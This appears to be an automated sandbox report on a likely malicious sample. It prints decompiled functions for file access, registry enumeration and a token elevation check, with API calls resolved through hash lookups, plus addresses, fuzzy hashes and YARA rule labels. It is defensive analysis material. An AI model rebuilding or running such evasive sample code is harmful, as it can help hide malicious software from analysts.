						} else {
							goto L10;
						}
					} else {
						goto L10;
					}
				}
				return _t13;
			}

0x70995724
0x70995725
0x70995727
0x7099572c
0x70995733
0x70995737
0x70995737
0x70995737
0x7099573b
0x70995781
0x70995781
0x7099573d
0x7099573d
0x70995743
0x7099574c
0x7099574f
0x70995766
0x70995777
0x70995777
0x70995779
0x7099577f
0x7099578a
0x709957a2
0x709957c2
0x709957c2
0x709957c4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x70995743
0x709957cc

APIs

RegQueryValueExA.KERNELBASE(?,7099D1F8,00000000,?,00000000,00000000,?,?,?,7099D1F8,?,709957F3,?,00000000,00000000), ref: 70995777
RegQueryValueExA.KERNELBASE(?,7099D1F8,00000000,?,00000000,00000000,00000000,00000000,?,?,?,7099D1F8,?,709957F3,?,00000000), ref: 709957C2

Memory Dump Source

Source File: 00000004.00000002.727624069.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true

Associated: 00000004.00000002.727609301.0000000070980000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.727735438.000000007099A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.727759857.000000007099D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.727776829.000000007099F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: cdff03e19aa9d02ca93ff40d7f69fa03f4eaa6943e7be9b0135aaa3fabe45ce6
Instruction ID: 344eae10dd6be2a6edd1b785555e4094154ba781a017f2d9020069633b3e2b45
Opcode Fuzzy Hash: cdff03e19aa9d02ca93ff40d7f69fa03f4eaa6943e7be9b0135aaa3fabe45ce6
Instruction Fuzzy Hash: 9911B171218305FFE6119E65DC80FAFB7EDDFC5658F00441DB58A97280EA21ED00977A

Uniqueness

Uniqueness Score: -1.00%

Function 70995AA8, Relevance: 1.6, APIs: 1, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E70995AA8(WCHAR** __ecx, void* __edx, intOrPtr _a4, long _a8, long _a12) {
				char _v24;
				void* __esi;
				void* _t16;
				void* _t21;
				void* _t24;
				void* _t29;
				long _t37;
				void* _t38;
				long _t39;
				WCHAR** _t40;
				intOrPtr* _t56;
				WCHAR** _t58;
				char* _t64;
				void* _t65;
				long _t66;

				_push(0);
				_push(_t62);
				_t66 = _t65 - 0x10;
				_t58 = __ecx;
				_t37 = _a8;
				if(E7098D288(__ecx, 0x2f) != 0) {
					_t62 = _t66;
					E7098D78C(__ecx, _t66);
					E7098D0B4(_t58,  *_t66);
					E7098D098(_t66);
				}
				if(_t37 == 0) {
					_t70 = _a4 - 1;
					if(_a4 != 1) {
						__eflags = _a4 - 4;
						_t37 = (0 | _a4 == 0x00000004) + 2;
						__eflags = _t37;
					} else {
						_t37 = 1;
					}
				}
				E7099621C(_t70);
				if(_a4 <= 5) {
					goto __eax;
				}
				_t62 = 0;
				if(_t37 != 2) {
					_t16 = 3;
					__eflags = _t37 - 1;
					_t38 = 0;
					_t39 =  ==  ? _t16 : _t38;
				} else {
					_t39 = 1;
				}
				if(E70992F8C(0x4bcc7cba, 0x80c50a91) == 0) {
					_push(0);
				} else {
					_t29 = CreateFileW( *_t58, 0, _t39, 0, _t62, _a12, 0); // executed
					_push(_t29);
				}
				_t40 =  &(_t58[3]);
				E7098C328(_t40);
				if(E7098C33C(_t40) != 0) {
					_t58[2] = E7099352C(0);
					_t21 = 0;
					goto L19;
				} else {
					if(_a4 == 2) {
						_t56 = E70992F8C(0x4bcc7cba, 0xceed09cc);
						__eflags = _t56;
						if(_t56 != 0) {
							 *_t56( *_t40, 0, 0, 2);
						}
					}
					_t64 =  &_v24;
					E709935D4(_t64, 0xff, 8);
					_t66 = _t66 + 0xc;
					_t24 = E70992F8C(0x4bcc7cba, 0xaaa9bb);
					if(_t24 == 0) {
						_t21 = 1;
						__eflags = 1;
						L19:
						return _t21;
					} else {
						_push(_t64);
						_push(_t64);
						_push(0);
						_push( *_t40);
						asm("int3");
						return _t24;
					}
				}
			}

0x70995aa8
0x70995aab
0x70995aac
0x70995aaf
0x70995ab1
0x70995abe
0x70995ac2
0x70995ac6
0x70995ad0
0x70995ad7
0x70995ad7
0x70995ade
0x70995ae0
0x70995ae5
0x70995aee
0x70995af6
0x70995af6
0x70995ae7
0x70995ae9
0x70995ae9
0x70995ae5
0x70995afb
0x70995b07
0x70995b1d
0x70995b1d
0x70995c38
0x70995b75
0x70995b7e
0x70995b7f
0x70995b84
0x70995b85
0x70995b77
0x70995b79
0x70995b79
0x70995b9b
0x70995baf
0x70995b9d
0x70995baa
0x70995bac
0x70995bac
0x70995bb1
0x70995bb6
0x70995bc4
0x70995c2f
0x70995c32
0x00000000
0x70995bc6
0x70995bcb
0x70995c18
0x70995c1a
0x70995c1c
0x70995c26
0x70995c26
0x70995c1c
0x70995bcd
0x70995bd9
0x70995bde
0x70995beb
0x70995bf2
0x70995bfe
0x70995bfe
0x70995bff
0x70995c06
0x70995bf4
0x70995bf4
0x70995bf5
0x70995bf6
0x70995bf8
0x70995bfa
0x70995bfb
0x70995bfb
0x70995bf2

Memory Dump Source

Source File: 00000004.00000002.727624069.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true

Associated: 00000004.00000002.727609301.0000000070980000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.727735438.000000007099A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.727759857.000000007099D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.727776829.000000007099F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eeabe617132e398e82a65465c1762e11739d48b756e8421e8f47b7f6bb2fd349
Instruction ID: 9676c04ab8e0bce906e0f63c610e7aaaa93cc731325a368f401b2ebac33ea1b3
Opcode Fuzzy Hash: eeabe617132e398e82a65465c1762e11739d48b756e8421e8f47b7f6bb2fd349
Instruction Fuzzy Hash: FD310470364306BEEB112A718D82F3F76AEEBC1208F10492CF94796181EE61AD04C32F

Uniqueness

Uniqueness Score: -1.00%

Function 70995B51, Relevance: 1.6, APIs: 1, Instructions: 63
fileCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E70995B51(void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t15;
				void* _t20;
				void* _t21;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				intOrPtr* _t32;
				WCHAR** _t33;
				long _t37;
				void* _t39;
				void* _t40;

				_t33 = __edi;
				if(__edx != 0) {
					_t37 = 3;
					if(_t21 != 2) {
						_t7 = 3;
						_t22 = 0;
						_t23 =  ==  ? _t7 : _t22;
					} else {
						_t23 = 1;
					}
					if(E70992F8C(0x4bcc7cba, 0x80c50a91) == 0) {
						_push(0);
					} else {
						_t20 = CreateFileW( *_t33, 0x80000000, _t23, 0, _t37, _a44, 0); // executed
						_push(_t20);
					}
					_t24 =  &(_t33[3]);
					E7098C328(_t24);
					if(E7098C33C(_t24) != 0) {
						_t33[2] = E7099352C(0x80000000);
						_t12 = 0;
						goto L14;
					} else {
						if( *((intOrPtr*)(_t40 + 0x24)) == 2) {
							_t32 = E70992F8C(0x4bcc7cba, 0xceed09cc);
							if(_t32 != 0) {
								 *_t32( *_t24, 0, 0, 2);
							}
						}
						_t39 = _t40 + 8;
						E709935D4(_t39, 0xff, 8);
						_t40 = _t40 + 0xc;
						_t15 = E70992F8C(0x4bcc7cba, 0xaaa9bb);
						if(_t15 == 0) {
							_t12 = 1;
							goto L14;
						} else {
							_push(_t39);
							_push(_t39);
							_push(0);
							_push( *_t24);
							asm("int3");
							return _t15;
						}
					}
				} else {
					__edi[2] = 2;
					_t12 = 0;
					L14:
					return _t12;
				}
			}

0x70995b51
0x70995b53
0x70995b6a
0x70995b75
0x70995b7e
0x70995b84
0x70995b85
0x70995b77
0x70995b79
0x70995b79
0x70995b9b
0x70995baf
0x70995b9d
0x70995baa
0x70995bac
0x70995bac
0x70995bb1
0x70995bb6
0x70995bc4
0x70995c2f
0x70995c32
0x00000000
0x70995bc6
0x70995bcb
0x70995c18
0x70995c1c
0x70995c26
0x70995c26
0x70995c1c
0x70995bcd
0x70995bd9
0x70995bde
0x70995beb
0x70995bf2
0x70995bfe
0x00000000
0x70995bf4
0x70995bf4
0x70995bf5
0x70995bf6
0x70995bf8
0x70995bfa
0x70995bfb
0x70995bfb
0x70995bf2
0x70995b55
0x70995b55
0x70995b5c
0x70995bff
0x70995c06
0x70995c06

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,4BCC7CBA,80C50A91), ref: 70995BAA

Memory Dump Source

Source File: 00000004.00000002.727624069.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true

Associated: 00000004.00000002.727609301.0000000070980000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.727735438.000000007099A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.727759857.000000007099D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.727776829.000000007099F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 26c16dd84db9d2095020c93a0a859f32a102ea0508fef39e3b0ec55714086586
Instruction ID: eec4f90f1937cd876ab9b83b8fc2c8d1af5ad261ab22836c574755ddb50a5bad
Opcode Fuzzy Hash: 26c16dd84db9d2095020c93a0a859f32a102ea0508fef39e3b0ec55714086586
Instruction Fuzzy Hash: 2201DD757A4307BEE71116219C82F7F776DDBC1254F108869F94256085DF629814837B

Uniqueness

Uniqueness Score: -1.00%

Function 70995B29, Relevance: 1.6, APIs: 1, Instructions: 57
fileCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E70995B29(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t15;
				void* _t20;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				void* _t31;
				intOrPtr* _t33;
				WCHAR** _t34;
				void* _t38;
				long _t39;
				void* _t41;
				void* _t42;

				_t34 = __edi;
				_t31 = 5;
				_t38 = 2;
				_t39 =  !=  ? _t31 : _t38;
				if(__ebx != 2) {
					_t7 = 3;
					_t22 = 0;
					_t23 =  ==  ? _t7 : _t22;
				} else {
					_t23 = 1;
				}
				if(E70992F8C(0x4bcc7cba, 0x80c50a91) == 0) {
					_push(0);
				} else {
					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t39, _a44, 0); // executed
					_push(_t20);
				}
				_t24 =  &(_t34[3]);
				E7098C328(_t24);
				if(E7098C33C(_t24) != 0) {
					_t34[2] = E7099352C(0xc0000000);
					_t12 = 0;
					goto L12;
				} else {
					if( *((intOrPtr*)(_t42 + 0x24)) == 2) {
						_t33 = E70992F8C(0x4bcc7cba, 0xceed09cc);
						if(_t33 != 0) {
							 *_t33( *_t24, 0, 0, 2);
						}
					}
					_t41 = _t42 + 8;
					E709935D4(_t41, 0xff, 8);
					_t42 = _t42 + 0xc;
					_t15 = E70992F8C(0x4bcc7cba, 0xaaa9bb);
					if(_t15 == 0) {
						_t12 = 1;
						L12:
						return _t12;
					} else {
						_push(_t41);
						_push(_t41);
						_push(0);
						_push( *_t24);
						asm("int3");
						return _t15;
					}
				}
			}

0x70995b29
0x70995b2d
0x70995b30
0x70995b33
0x70995b75
0x70995b7e
0x70995b84
0x70995b85
0x70995b77
0x70995b79
0x70995b79
0x70995b9b
0x70995baf
0x70995b9d
0x70995baa
0x70995bac
0x70995bac
0x70995bb1
0x70995bb6
0x70995bc4
0x70995c2f
0x70995c32
0x00000000
0x70995bc6
0x70995bcb
0x70995c18
0x70995c1c
0x70995c26
0x70995c26
0x70995c1c
0x70995bcd
0x70995bd9
0x70995bde
0x70995beb
0x70995bf2
0x70995bfe
0x70995bff
0x70995c06
0x70995bf4
0x70995bf4
0x70995bf5
0x70995bf6
0x70995bf8
0x70995bfa
0x70995bfb
0x70995bfb
0x70995bf2

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,4BCC7CBA,80C50A91), ref: 70995BAA

Memory Dump Source

Source File: 00000004.00000002.727624069.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true

Associated: 00000004.00000002.727609301.0000000070980000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.727735438.000000007099A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.727759857.000000007099D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.727776829.000000007099F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 0fa86986c89fdfff574c3ac8d82252a53ce624ce43e07f87df1cda0750746311
Instruction ID: f1b648ecaaedcb506f51cac26828545c4c719716589efbf79eb76579e9d5bd38
Opcode Fuzzy Hash: 0fa86986c89fdfff574c3ac8d82252a53ce624ce43e07f87df1cda0750746311
Instruction Fuzzy Hash: EB01DB703A0307BFFB1116108D42F7F76ADDFC2248F158869B94266095EF619C04833B

Uniqueness

Uniqueness Score: -1.00%

Function 70995B3D, Relevance: 1.6, APIs: 1, Instructions: 56
fileCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E70995B3D(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t15;
				void* _t20;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				intOrPtr* _t33;
				WCHAR** _t34;
				long _t38;
				void* _t40;
				void* _t41;

				_t34 = __edi;
				_t38 = 2;
				asm("adc ebp, 0x0");
				if(__ebx != 2) {
					_t7 = 3;
					_t22 = 0;
					_t23 =  ==  ? _t7 : _t22;
				} else {
					_t23 = 1;
				}
				if(E70992F8C(0x4bcc7cba, 0x80c50a91) == 0) {
					_push(0);
				} else {
					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t38, _a44, 0); // executed
					_push(_t20);
				}
				_t24 =  &(_t34[3]);
				E7098C328(_t24);
				if(E7098C33C(_t24) != 0) {
					_t34[2] = E7099352C(0xc0000000);
					_t12 = 0;
					goto L12;
				} else {
					if( *((intOrPtr*)(_t41 + 0x24)) == 2) {
						_t33 = E70992F8C(0x4bcc7cba, 0xceed09cc);
						if(_t33 != 0) {
							 *_t33( *_t24, 0, 0, 2);
						}
					}
					_t40 = _t41 + 8;
					E709935D4(_t40, 0xff, 8);
					_t41 = _t41 + 0xc;
					_t15 = E70992F8C(0x4bcc7cba, 0xaaa9bb);
					if(_t15 == 0) {
						_t12 = 1;
						L12:
						return _t12;
					} else {
						_push(_t40);
						_push(_t40);
						_push(0);
						_push( *_t24);
						asm("int3");
						return _t15;
					}
				}
			}

0x70995b3d
0x70995b44
0x70995b47
0x70995b75
0x70995b7e
0x70995b84
0x70995b85
0x70995b77
0x70995b79
0x70995b79
0x70995b9b
0x70995baf
0x70995b9d
0x70995baa
0x70995bac
0x70995bac
0x70995bb1
0x70995bb6
0x70995bc4
0x70995c2f
0x70995c32
0x00000000
0x70995bc6
0x70995bcb
0x70995c18
0x70995c1c
0x70995c26
0x70995c26
0x70995c1c
0x70995bcd
0x70995bd9
0x70995bde
0x70995beb
0x70995bf2
0x70995bfe
0x70995bff
0x70995c06
0x70995bf4
0x70995bf4
0x70995bf5
0x70995bf6
0x70995bf8
0x70995bfa
0x70995bfb
0x70995bfb
0x70995bf2

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,4BCC7CBA,80C50A91), ref: 70995BAA

Memory Dump Source

Source File: 00000004.00000002.727624069.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true

Associated: 00000004.00000002.727609301.0000000070980000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.727735438.000000007099A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.727759857.000000007099D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.727776829.000000007099F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 5b8d02cd4674f4ed770eb1c7c80a412027ed08d7cd8f65890b2514b95d1dd015
Instruction ID: ba23afe6f74496ec2355a9645b10fa29264962df63860606fb155ceb04d89cc9
Opcode Fuzzy Hash: 5b8d02cd4674f4ed770eb1c7c80a412027ed08d7cd8f65890b2514b95d1dd015
Instruction Fuzzy Hash: 4C01DB747603077EFB1116218D82F7F766EDBC2244F154869B942660C5EF659C14832B

Uniqueness

Uniqueness Score: -1.00%

Function 70995B1F, Relevance: 1.6, APIs: 1, Instructions: 52
fileCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E70995B1F(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t6;
				void* _t11;
				void* _t14;
				void* _t19;
				void* _t21;
				long _t22;
				WCHAR** _t23;
				intOrPtr* _t30;
				WCHAR** _t31;
				long _t35;
				void* _t37;
				void* _t38;

				_t31 = __edi;
				_t35 = 3;
				if(__ebx != 2) {
					_t6 = 3;
					_t21 = 0;
					_t22 =  ==  ? _t6 : _t21;
				} else {
					_t22 = 1;
				}
				if(E70992F8C(0x4bcc7cba, 0x80c50a91) == 0) {
					_push(0);
				} else {
					_t19 = CreateFileW( *_t31, 0x100, _t22, 0, _t35, _a44, 0); // executed
					_push(_t19);
				}
				_t23 =  &(_t31[3]);
				E7098C328(_t23);
				if(E7098C33C(_t23) != 0) {
					_t31[2] = E7099352C(0x100);
					_t11 = 0;
					goto L12;
				} else {
					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
						_t30 = E70992F8C(0x4bcc7cba, 0xceed09cc);
						if(_t30 != 0) {
							 *_t30( *_t23, 0, 0, 2);
						}
					}
					_t37 = _t38 + 8;
					E709935D4(_t37, 0xff, 8);
					_t38 = _t38 + 0xc;
					_t14 = E70992F8C(0x4bcc7cba, 0xaaa9bb);
					if(_t14 == 0) {
						_t11 = 1;
						L12:
						return _t11;
					} else {
						_push(_t37);
						_push(_t37);
						_push(0);
						_push( *_t23);
						asm("int3");
						return _t14;
					}
				}
			}

0x70995b1f
0x70995b26
0x70995b75
0x70995b7e
0x70995b84
0x70995b85
0x70995b77
0x70995b79
0x70995b79
0x70995b9b
0x70995baf
0x70995b9d
0x70995baa
0x70995bac
0x70995bac
0x70995bb1
0x70995bb6
0x70995bc4
0x70995c2f
0x70995c32
0x00000000
0x70995bc6
0x70995bcb
0x70995c18
0x70995c1c
0x70995c26
0x70995c26
0x70995c1c
0x70995bcd
0x70995bd9
0x70995bde
0x70995beb
0x70995bf2
0x70995bfe
0x70995bff
0x70995c06
0x70995bf4
0x70995bf4
0x70995bf5
0x70995bf6
0x70995bf8
0x70995bfa
0x70995bfb
0x70995bfb
0x70995bf2

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,4BCC7CBA,80C50A91), ref: 70995BAA

Memory Dump Source

Source File: 00000004.00000002.727624069.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true

Associated: 00000004.00000002.727609301.0000000070980000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.727735438.000000007099A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.727759857.000000007099D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.727776829.000000007099F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c230670b004b2ad28e76934f353d99ed69517ec83133175e69b5ed079cd00cba
Instruction ID: 7ff922d0826e3f8481138de7540ae4deb53eae09e5580b17b6a2fa8cbb3e3dcf
Opcode Fuzzy Hash: c230670b004b2ad28e76934f353d99ed69517ec83133175e69b5ed079cd00cba
Instruction Fuzzy Hash: 4401A9707A0307BEEB1116208D42F7F766DDBC6244F114869B98665095DF61A914833B

Uniqueness

Uniqueness Score: -1.00%

Function 70995B6D, Relevance: 1.6, APIs: 1, Instructions: 51
fileCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E70995B6D(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t6;
				void* _t11;
				void* _t14;
				void* _t19;
				void* _t21;
				long _t22;
				WCHAR** _t23;
				intOrPtr* _t30;
				WCHAR** _t31;
				long _t35;
				void* _t37;
				void* _t38;

				_t31 = __edi;
				_t35 = 3;
				if(__ebx != 2) {
					_t6 = 3;
					_t21 = 0;
					_t22 =  ==  ? _t6 : _t21;
				} else {
					_t22 = 1;
				}
				if(E70992F8C(0x4bcc7cba, 0x80c50a91) == 0) {
					_push(0);
				} else {
					_t19 = CreateFileW( *_t31, 0, _t22, 0, _t35, _a44, 0); // executed
					_push(_t19);
				}
				_t23 =  &(_t31[3]);
				E7098C328(_t23);
				if(E7098C33C(_t23) != 0) {
					_t31[2] = E7099352C(0);
					_t11 = 0;
					goto L12;
				} else {
					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
						_t30 = E70992F8C(0x4bcc7cba, 0xceed09cc);
						if(_t30 != 0) {
							 *_t30( *_t23, 0, 0, 2);
						}
					}
					_t37 = _t38 + 8;
					E709935D4(_t37, 0xff, 8);
					_t38 = _t38 + 0xc;
					_t14 = E70992F8C(0x4bcc7cba, 0xaaa9bb);
					if(_t14 == 0) {
						_t11 = 1;
						L12:
						return _t11;
					} else {
						_push(_t37);
						_push(_t37);
						_push(0);
						_push( *_t23);
						asm("int3");
						return _t14;
					}
				}
			}

0x70995b6d
0x70995b71
0x70995b75
0x70995b7e
0x70995b84
0x70995b85
0x70995b77
0x70995b79
0x70995b79
0x70995b9b
0x70995baf
0x70995b9d
0x70995baa
0x70995bac
0x70995bac
0x70995bb1
0x70995bb6
0x70995bc4
0x70995c2f
0x70995c32
0x00000000
0x70995bc6
0x70995bcb
0x70995c18
0x70995c1c
0x70995c26
0x70995c26
0x70995c1c
0x70995bcd
0x70995bd9
0x70995bde
0x70995beb
0x70995bf2
0x70995bfe
0x70995bff
0x70995c06
0x70995bf4
0x70995bf4
0x70995bf5
0x70995bf6
0x70995bf8
0x70995bfa
0x70995bfb
0x70995bfb
0x70995bf2

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,4BCC7CBA,80C50A91), ref: 70995BAA

Memory Dump Source

Source File: 00000004.00000002.727624069.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true

Associated: 00000004.00000002.727609301.0000000070980000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.727735438.000000007099A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.727759857.000000007099D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.727776829.000000007099F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: f41fd778113157c199e1483cbf3e3356fcc1afe5b5c32d8304a410e71b511c74
Instruction ID: 2fe8d979ef5f293813d7b771c04caf2e6987e63bff7145baa45787037c978417
Opcode Fuzzy Hash: f41fd778113157c199e1483cbf3e3356fcc1afe5b5c32d8304a410e71b511c74
Instruction Fuzzy Hash: 1EF0C8743A0307BEEB1116218D82F7F766EEFC2648F114869B94766085EF61A914C37B

Uniqueness

Uniqueness Score: -1.00%

Function 70995D7C, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E70995D7C(void* __ecx, intOrPtr _a4) {
				long _v16;
				long _t4;
				void* _t8;
				void** _t9;
				intOrPtr _t17;
				long* _t18;

				_push(_t16);
				_t8 = __ecx;
				_t17 = _a4;
				if(_t17 != 0) {
					asm("pxor xmm0, xmm0");
					asm("movq [esi], xmm0");
				}
				_t9 = _t8 + 0xc;
				if(E7098C33C(_t9) != 0) {
					L7:
					_t4 = 0;
					goto L10;
				} else {
					asm("stosd");
					asm("stosd");
					if(E70992F8C(0x4bcc7cba, 0xceed09cc) == 0) {
						_t4 = 0;
					} else {
						_t4 = SetFilePointer( *_t9, 0,  &_v16, 1); // executed
					}
					if(_t4 != 0xffffffff) {
						if(_t17 != 0) {
							 *_t18 = _t4;
							asm("movq xmm0, [esp]");
							asm("movq [esi], xmm0");
						}
						L10:
						return _t4;
					} else {
						goto L7;
					}
				}
			}

0x70995d80
0x70995d81
0x70995d83
0x70995d89
0x70995d8b
0x70995d8f
0x70995d8f
0x70995d93
0x70995d9f
0x70995dd3
0x70995dd3
0x00000000
0x70995da1
0x70995da6
0x70995da7
0x70995dbb
0x70995dcc
0x70995dbd
0x70995dc8
0x70995dc8
0x70995dd1
0x70995dd9
0x70995ddb
0x70995dde
0x70995de3
0x70995de3
0x70995de7
0x70995dec
0x00000000
0x00000000
0x00000000
0x70995dd1

APIs

SetFilePointer.KERNELBASE(?,00000000,?,00000001,CEED09CC,?,?,00000000,00000000,?,70995CB4,?,?), ref: 70995DC8

Memory Dump Source

Source File: 00000004.00000002.727624069.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true

Associated: 00000004.00000002.727609301.0000000070980000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.727735438.000000007099A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.727759857.000000007099D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.727776829.000000007099F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 7634ac0c9d3648873fd736d4ea4b19d370915cdf3bd7e6405098399fd11748dd
Instruction ID: cc06401c664b8b0548cbf79944af2f32b5b43cf315a1e6fafee35396ffc5de37
Opcode Fuzzy Hash: 7634ac0c9d3648873fd736d4ea4b19d370915cdf3bd7e6405098399fd11748dd
Instruction Fuzzy Hash: 0AF0F431A297127ED3515A38DC44B9FB7F9EFD1320F214B2EF582A61C4E761984483AB

Uniqueness

Uniqueness Score: -1.00%

Function 709910CC, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E709910CC(void* __ecx) {
				void* _v36;
				void* _v44;
				int _t15;
				intOrPtr* _t21;
				void* _t24;
				intOrPtr* _t25;

				_t24 = __ecx;
				 *_t25 = 0;
				_t21 = E70992F94(0xd0443458, 0xd8ece5ad, 0xd0443458, 0xd0443458);
				if(_t21 == 0) {
					L5:
					return 0;
				}
				_push(_t25);
				_push(8);
				_push(_t24);
				if( *_t21() == 0 || E70992F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458) == 0) {
					goto L5;
				} else {
					_t2 = _t25 + 8 - 4; // 0xd0443454
					_t15 = GetTokenInformation( *(_t25 + 0x10), 0x14, _t2, 4, _t25 + 8); // executed
					if(_t15 == 0) {
						goto L5;
					}
					return 0 |  *((intOrPtr*)(_t25 + 4)) != 0x00000000;
				}
			}

0x709910da
0x709910dc
0x709910ea
0x709910ee
0x70991137
0x00000000
0x70991137
0x709910f3
0x709910f4
0x709910f6
0x709910fb
0x00000000
0x70991114
0x70991118
0x70991125
0x70991129
0x00000000
0x00000000
0x00000000
0x70991132

APIs

GetTokenInformation.KERNELBASE(00000004,00000014,D0443454,00000004,D0443458,D0443458,D0443458), ref: 70991125

Memory Dump Source

Source File: 00000004.00000002.727624069.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true

Associated: 00000004.00000002.727609301.0000000070980000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.727735438.000000007099A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.727759857.000000007099D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.727776829.000000007099F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: ad9c72b20c447e21fde483402609026f9e34a91fec1d63206d321a76ac7e48c5
Instruction ID: fa93e1bedf9276169eddcaf1dd485a132f362a8332c2ab0379f0a5d50d04fbfa
Opcode Fuzzy Hash: ad9c72b20c447e21fde483402609026f9e34a91fec1d63206d321a76ac7e48c5
Instruction Fuzzy Hash: 79F0A9B4718246BFFB1495288D05F7F22AD6BC1605F10C82CB641DA288FA78C80A8336

Uniqueness

Uniqueness Score: -1.00%

Function 709955B8, Relevance: 1.5, APIs: 1, Instructions: 45
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E709955B8(void* __ecx) {
				long _t9;
				char* _t11;
				void* _t16;
				int _t17;
				int _t18;
				int* _t19;

				_t18 = 0;
				_t17 = _t19[0x48];
				_t16 = __ecx;
				_t11 =  &(_t19[1]);
				 *_t17 = 0;
				 *((intOrPtr*)(_t17 + 4)) = 0;
				 *((intOrPtr*)(_t17 + 8)) = 0;
				while(1) {
					 *_t19 = 0x105;
					if(E70992F8C(0xd0443458, 0x286b2253) == 0) {
						goto L4;
					}
					_t9 = RegEnumValueA( *(_t16 + 4), _t18, _t11, _t19, 0, 0, 0, 0); // executed
					if(_t9 == 0) {
						goto L4;
					}
					return _t17;
					L4:
					E7098E6E8(_t17, _t11,  *_t17);
					_t18 = _t18 + 1;
				}
			}

0x709955c2
0x709955c4
0x709955cb
0x709955cd
0x709955d1
0x709955d3
0x709955d6
0x709955d9
0x709955d9
0x709955f3
0x00000000
0x00000000
0x70995604
0x70995608
0x00000000
0x00000000
0x70995616
0x70995619
0x7099561e
0x70995623
0x70995623

APIs

RegEnumValueA.KERNELBASE(?,00000001,?,00000000,00000000,00000000,00000000,00000000,D0443458,286B2253,?,?,D0443458,286B2253), ref: 70995604

Memory Dump Source

Source File: 00000004.00000002.727624069.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true

